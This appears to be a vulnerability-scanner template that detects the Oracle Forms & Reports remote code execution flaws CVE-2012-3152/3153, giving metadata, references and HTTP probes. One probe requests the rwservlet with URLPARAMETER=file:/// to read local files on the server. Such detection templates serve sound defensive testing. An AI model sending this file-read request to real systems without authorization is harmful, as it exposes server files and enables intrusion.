id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo tags: cve,cve2012,oracle,rce,edb metadata: max-request: 2 http: - method: GET path: - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - type: status status: - 200 - type: dsl dsl: - '!contains(body_2, "